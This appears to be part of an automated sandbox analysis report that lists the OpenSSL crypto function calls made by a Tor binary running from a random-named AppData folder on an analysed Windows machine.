Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A5480 CRYPTO_zalloc,CRYPTO_THREAD_lock_new,EVP_PKEY_up_ref,X509_up_ref,EVP_PKEY_up_ref,X509_chain_up_ref,CRYPTO_malloc,memcpy,CRYPTO_malloc,memcpy,CRYPTO_malloc,memcpy,CRYPTO_memdup,X509_STORE_up_ref,X509_STORE_up_ref,CRYPTO_strdup,ERR_put_error,ERR_put_error,ERR_put_error,CRYPTO_free,	25_2_6C0A5480
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0914A9 CRYPTO_zalloc,BIO_set_init,BIO_set_data,BIO_clear_flags,ERR_put_error,	25_2_6C0914A9
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C54D0 CRYPTO_memdup,CRYPTO_free,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,	25_2_6C0C54D0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A3510 CRYPTO_malloc,memcpy,memcpy,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_malloc,memset,OPENSSL_cleanse,CRYPTO_clear_free,	25_2_6C0A3510
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BD53B CRYPTO_free,CRYPTO_malloc,memcpy,ERR_put_error,	25_2_6C0BD53B
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C553B CRYPTO_free,	25_2_6C0C553B
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0DF549 CRYPTO_clear_free,EVP_PKEY_CTX_free,ASN1_item_free,	25_2_6C0DF549
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BD55B CRYPTO_free,CRYPTO_malloc,memcpy,	25_2_6C0BD55B
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D9558 BN_num_bits,BN_bn2bin,EVP_PKEY_size,EVP_DigestSignInit,EVP_DigestSign,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,	25_2_6C0D9558
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0E5560 CONF_parse_list,CRYPTO_malloc,memcpy,CRYPTO_free,CRYPTO_free,ERR_put_error,__stack_chk_fail,CRYPTO_malloc,memcpy,CRYPTO_free,CRYPTO_free,ERR_put_error,	25_2_6C0E5560
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0E9570 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,	25_2_6C0E9570
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C9589 EVP_PKEY_get1_tls_encodedpoint,CRYPTO_free,	25_2_6C0C9589
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BF583 CRYPTO_free,	25_2_6C0BF583
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BF5C4 CRYPTO_free,	25_2_6C0BF5C4
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C55D4 CRYPTO_free,CRYPTO_memdup,CRYPTO_memdup,	25_2_6C0C55D4
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BF5E9 CRYPTO_free,	25_2_6C0BF5E9
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0DF5F1 CRYPTO_clear_free,	25_2_6C0DF5F1
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A7600 COMP_zlib,CRYPTO_mem_ctrl,OPENSSL_sk_new,COMP_get_type,CRYPTO_malloc,COMP_get_name,OPENSSL_sk_push,OPENSSL_sk_sort,CRYPTO_mem_ctrl,	25_2_6C0A7600
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0DD611 CRYPTO_zalloc,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,__stack_chk_fail,	25_2_6C0DD611
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C095630 CRYPTO_zalloc,ERR_put_error,memcpy,BUF_MEM_grow,BUF_MEM_grow,	25_2_6C095630
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0B5640 CRYPTO_set_ex_data,	25_2_6C0B5640
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C5647 CRYPTO_free,CRYPTO_free,CRYPTO_free,	25_2_6C0C5647
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0AD653 CRYPTO_free,EVP_PKEY_free,CRYPTO_free,	25_2_6C0AD653
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BD650 CRYPTO_THREAD_write_lock,OPENSSL_LH_get_down_load,OPENSSL_LH_set_down_load,OPENSSL_LH_doall_arg,OPENSSL_LH_set_down_load,CRYPTO_THREAD_unlock,__stack_chk_fail,	25_2_6C0BD650
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0B5650 CRYPTO_get_ex_data,	25_2_6C0B5650
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0E5664 CRYPTO_free,	25_2_6C0E5664
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0B5660 CRYPTO_set_ex_data,	25_2_6C0B5660
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0B5670 CRYPTO_get_ex_data,	25_2_6C0B5670
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BB68B CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,	25_2_6C0BB68B
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0E9680 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,	25_2_6C0E9680
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0B1696 ERR_put_error,CRYPTO_free,	25_2_6C0B1696
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C56A0 CRYPTO_free,CRYPTO_free,CRYPTO_free,	25_2_6C0C56A0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A76A4 CRYPTO_free,	25_2_6C0A76A4
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0AD6B0 X509_VERIFY_PARAM_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,X509_free,CRYPTO_free_ex_data,BIO_pop,BIO_free,BIO_free_all,BIO_free_all,BUF_MEM_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,COMP_CTX_free,COMP_CTX_free,EVP_MD_CTX_free,EVP_MD_CTX_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,SCT_LIST_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_MD_CTX_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,ASYNC_WAIT_CTX_free,CRYPTO_free,OPENSSL_sk_free,CRYPTO_THREAD_lock_free,CRYPTO_free,	25_2_6C0AD6B0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BB6D0 CRYPTO_set_ex_data,	25_2_6C0BB6D0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C56EC CRYPTO_free,CRYPTO_free,CRYPTO_free,	25_2_6C0C56EC
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BB6E0 CRYPTO_get_ex_data,	25_2_6C0BB6E0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BB6F0 CRYPTO_zalloc,time,CRYPTO_THREAD_lock_new,CRYPTO_new_ex_data,ERR_put_error,CRYPTO_THREAD_lock_free,CRYPTO_free,ERR_put_error,CRYPTO_free,	25_2_6C0BB6F0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C96F1 EVP_PKEY_free,CRYPTO_free,	25_2_6C0C96F1
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A1702 CRYPTO_free,	25_2_6C0A1702
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BD700 CRYPTO_THREAD_write_lock,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,	25_2_6C0BD700
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0CF720 CRYPTO_free,time,CRYPTO_free,CRYPTO_malloc,memcpy,EVP_sha256,EVP_Digest,EVP_MD_size,CRYPTO_free,__stack_chk_fail,	25_2_6C0CF720
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A173A CRYPTO_free,strlen,CRYPTO_strdup,ERR_put_error,ERR_put_error,ERR_put_error,	25_2_6C0A173A
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D1747 EVP_MD_CTX_free,CRYPTO_free,CRYPTO_strndup,	25_2_6C0D1747
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0B5744 strlen,CRYPTO_free,CRYPTO_strdup,CRYPTO_free,ERR_put_error,	25_2_6C0B5744
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0E5758 CRYPTO_free,	25_2_6C0E5758
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A3789 CRYPTO_clear_free,	25_2_6C0A3789
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A578C CRYPTO_memdup,X509_STORE_up_ref,X509_STORE_up_ref,CRYPTO_strdup,	25_2_6C0A578C
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C5795 CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_realloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,	25_2_6C0C5795
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C3790 CRYPTO_strdup,	25_2_6C0C3790
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0E9790 BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,CRYPTO_strdup,CRYPTO_strdup,ERR_put_error,CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,ERR_put_error,	25_2_6C0E9790
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D97C4 BN_num_bits,BN_bn2bin,EVP_PKEY_size,EVP_DigestSignInit,EVP_DigestSign,CRYPTO_free,BN_num_bits,BN_num_bits,memset,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,	25_2_6C0D97C4
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0B57D8 CRYPTO_free,	25_2_6C0B57D8
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0CF7EC CRYPTO_free,	25_2_6C0CF7EC
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0E57E0 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_put_error,	25_2_6C0E57E0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0B7010 CRYPTO_free,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_memdup,	25_2_6C0B7010
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A5033 i2d_X509_NAME,i2d_X509_NAME,CRYPTO_free,CRYPTO_free,memcmp,__stack_chk_fail,	25_2_6C0A5033
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0DB059 CRYPTO_free,EVP_CIPHER_CTX_free,HMAC_CTX_free,	25_2_6C0DB059
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C095050 CRYPTO_free,CRYPTO_free,	25_2_6C095050
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D5089 CRYPTO_free,EVP_MD_CTX_free,	25_2_6C0D5089
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0B1080 CRYPTO_zalloc,CRYPTO_THREAD_lock_new,OPENSSL_sk_dup,X509_VERIFY_PARAM_new,X509_VERIFY_PARAM_inherit,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_malloc,memcpy,CRYPTO_new_ex_data,ERR_put_error,ERR_put_error,ERR_put_error,CRYPTO_free,ERR_put_error,	25_2_6C0B1080
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A1090 CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,	25_2_6C0A1090
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0DB0A7 CRYPTO_free,EVP_CIPHER_CTX_free,HMAC_CTX_free,	25_2_6C0DB0A7
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0CD0A0 CRYPTO_malloc,memcpy,	25_2_6C0CD0A0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A50E8 CRYPTO_free,CRYPTO_free,memcmp,	25_2_6C0A50E8
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0B70E1 CRYPTO_free,	25_2_6C0B70E1
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D50E0 EVP_MD_CTX_new,X509_get0_pubkey,EVP_PKEY_size,BIO_free,EVP_MD_CTX_free,CRYPTO_free,EVP_PKEY_id,EVP_DigestVerifyInit,EVP_PKEY_id,EVP_DigestVerify,EVP_PKEY_id,EVP_PKEY_id,CRYPTO_malloc,BUF_reverse,EVP_DigestUpdate,EVP_MD_CTX_ctrl,EVP_DigestVerifyFinal,RSA_pkey_ctx_ctrl,RSA_pkey_ctx_ctrl,__stack_chk_fail,memcpy,memcpy,	25_2_6C0D50E0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0950FC CRYPTO_free,CRYPTO_free,	25_2_6C0950FC
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A5108 CRYPTO_free,CRYPTO_free,	25_2_6C0A5108
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0CD111 CRYPTO_malloc,memcpy,	25_2_6C0CD111
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C112C OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_free,OPENSSL_sk_free,__stack_chk_fail,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_free,OPENSSL_sk_free,__stack_chk_fail,CRYPTO_malloc,memcpy,	25_2_6C0C112C
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A5120 CRYPTO_THREAD_run_once,	25_2_6C0A5120
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0CF140 CRYPTO_free,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_memdup,CRYPTO_free,__stack_chk_fail,	25_2_6C0CF140
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C095150 CRYPTO_zalloc,ERR_put_error,BUF_MEM_grow,	25_2_6C095150
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A5160 CRYPTO_zalloc,CRYPTO_THREAD_lock_new,ERR_put_error,ERR_put_error,CRYPTO_free,	25_2_6C0A5160
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0E5180 CRYPTO_free,	25_2_6C0E5180
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BB1C9 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,ERR_put_error,	25_2_6C0BB1C9
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0CF1C4 CRYPTO_free,	25_2_6C0CF1C4
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0E11D0 EVP_CIPHER_key_length,EVP_CIPHER_iv_length,CRYPTO_malloc,__stack_chk_fail,OPENSSL_cleanse,__stack_chk_fail,OPENSSL_cleanse,__stack_chk_fail,CRYPTO_malloc,memcpy,memcpy,CRYPTO_malloc,memcpy,memcmp,memcmp,memcmp,ERR_put_error,CRYPTO_clear_free,ERR_put_error,	25_2_6C0E11D0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BF1FC __stack_chk_fail,CRYPTO_free,	25_2_6C0BF1FC
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D31F0 CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,	25_2_6C0D31F0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BD20B CRYPTO_free,CRYPTO_strdup,	25_2_6C0BD20B
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BB203 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,ERR_put_error,	25_2_6C0BB203
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A524B X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,	25_2_6C0A524B
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BB241 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,ERR_put_error,	25_2_6C0BB241
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D3256 CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,	25_2_6C0D3256
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BB256 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,ERR_put_error,	25_2_6C0BB256
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C095280 CRYPTO_zalloc,ERR_put_error,	25_2_6C095280
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A9280 ERR_put_error,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,OPENSSL_sk_new_null,OPENSSL_sk_value,OPENSSL_sk_push,OPENSSL_sk_num,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_free,CRYPTO_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_set_cmp_func,OPENSSL_sk_sort,OPENSSL_sk_free,CRYPTO_free,ERR_put_error,CRYPTO_free,ERR_put_error,CRYPTO_free,__stack_chk_fail,BIO_snprintf,CRYPTO_malloc,ERR_put_error,	25_2_6C0A9280
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C72E0 time,EVP_MD_CTX_new,EVP_PKEY_new_raw_private_key,EVP_sha256,EVP_DigestSignInit,EVP_DigestSign,EVP_MD_CTX_free,EVP_PKEY_free,CRYPTO_memcmp,EVP_MD_CTX_free,EVP_PKEY_free,EVP_MD_CTX_free,EVP_PKEY_free,__stack_chk_fail,	25_2_6C0C72E0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A52F0 EVP_PKEY_free,X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,	25_2_6C0A52F0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A531B EVP_PKEY_free,X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,	25_2_6C0A531B
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D5336 EVP_PKEY_size,BIO_free,EVP_MD_CTX_free,CRYPTO_free,EVP_PKEY_id,	25_2_6C0D5336
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BD340 CRYPTO_free,CRYPTO_memdup,	25_2_6C0BD340
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0DB340 OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_num,OPENSSL_sk_value,memcmp,OPENSSL_sk_value,OPENSSL_sk_num,memcpy,OPENSSL_sk_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_dup,OPENSSL_sk_value,OPENSSL_sk_num,OPENSSL_sk_num,OPENSSL_sk_value,__stack_chk_fail,CRYPTO_memcmp,	25_2_6C0DB340
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D9361 EVP_MD_CTX_new,strlen,EVP_PKEY_security_bits,BN_num_bits,BN_bn2bin,EVP_PKEY_size,EVP_DigestSignInit,EVP_DigestSign,CRYPTO_free,BN_num_bits,BN_num_bits,memset,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,EVP_PKEY_new,EVP_PKEY_assign,EVP_PKEY_get1_tls_encodedpoint,CRYPTO_free,DH_free,EVP_PKEY_get0_DH,EVP_PKEY_free,DH_get0_pqg,DH_get0_key,EVP_MD_CTX_free,RSA_pkey_ctx_ctrl,RSA_pkey_ctx_ctrl,__stack_chk_fail,CRYPTO_free,CRYPTO_malloc,RAND_bytes,__stack_chk_fail,	25_2_6C0D9361
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0DF387 CRYPTO_clear_free,EVP_PKEY_free,	25_2_6C0DF387
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0CF3A4 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,	25_2_6C0CF3A4
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BB3F0 CRYPTO_free_ex_data,OPENSSL_cleanse,OPENSSL_cleanse,X509_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_clear_free,	25_2_6C0BB3F0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1A4FA0 CRYPTO_free,CRYPTO_free,free,CRYPTO_free,	25_2_6C1A4FA0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1DC0A0 BUF_MEM_free,CRYPTO_secure_clear_free,CRYPTO_free,CRYPTO_clear_free,free,	25_2_6C1DC0A0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1DC120 BUF_MEM_grow,CRYPTO_secure_malloc,memcpy,CRYPTO_secure_clear_free,CRYPTO_realloc,malloc,memset,memset,ERR_put_error,	25_2_6C1DC120
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C29F1D0 CRYPTO_zalloc,CRYPTO_malloc,malloc,memset,	25_2_6C29F1D0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1B32D0 BIO_free,CRYPTO_free_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,free,	25_2_6C1B32D0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C29D3E0 OPENSSL_LH_insert,CRYPTO_realloc,memset,CRYPTO_malloc,malloc,__stack_chk_fail,OPENSSL_LH_delete,CRYPTO_free,CRYPTO_realloc,__stack_chk_fail,	25_2_6C29D3E0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1D6C14 CRYPTO_free,BN_is_negative,BN_is_zero,BIO_snprintf,BIO_snprintf,CRYPTO_free,BN_free,	25_2_6C1D6C14
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1D0C00 CRYPTO_free,CRYPTO_malloc,__stack_chk_fail,	25_2_6C1D0C00
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C202C00 DH_meth_dup,CRYPTO_malloc,CRYPTO_strdup,CRYPTO_free,ERR_put_error,	25_2_6C202C00
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1AAC39 CRYPTO_THREAD_get_local,CRYPTO_free,OPENSSL_sk_push,	25_2_6C1AAC39
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1DEC30 CAST_cfb64_encrypt,CAST_encrypt,CAST_encrypt,__stack_chk_fail,CAST_ecb_encrypt,CAST_encrypt,CAST_decrypt,__stack_chk_fail,	25_2_6C1DEC30
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C27AC10 EVP_Digest,CRYPTO_zalloc,EVP_MD_CTX_set_flags,EVP_DigestInit_ex,EVP_MD_CTX_reset,CRYPTO_free,EVP_MD_CTX_set_flags,OPENSSL_cleanse,OPENSSL_die,EVP_MD_CTX_ctrl,	25_2_6C27AC10
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1D6C47 CRYPTO_free,BN_div_word,BN_is_zero,BIO_snprintf,BIO_snprintf,CRYPTO_free,BN_free,	25_2_6C1D6C47
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1ECC70 CMS_EncryptedData_decrypt,CMS_get0_type,OBJ_obj2nid,CMS_EncryptedData_set1_key,CMS_dataInit,BIO_pop,BIO_free,CMS_get0_content,ERR_put_error,ERR_put_error,BIO_free_all,	25_2_6C1ECC70
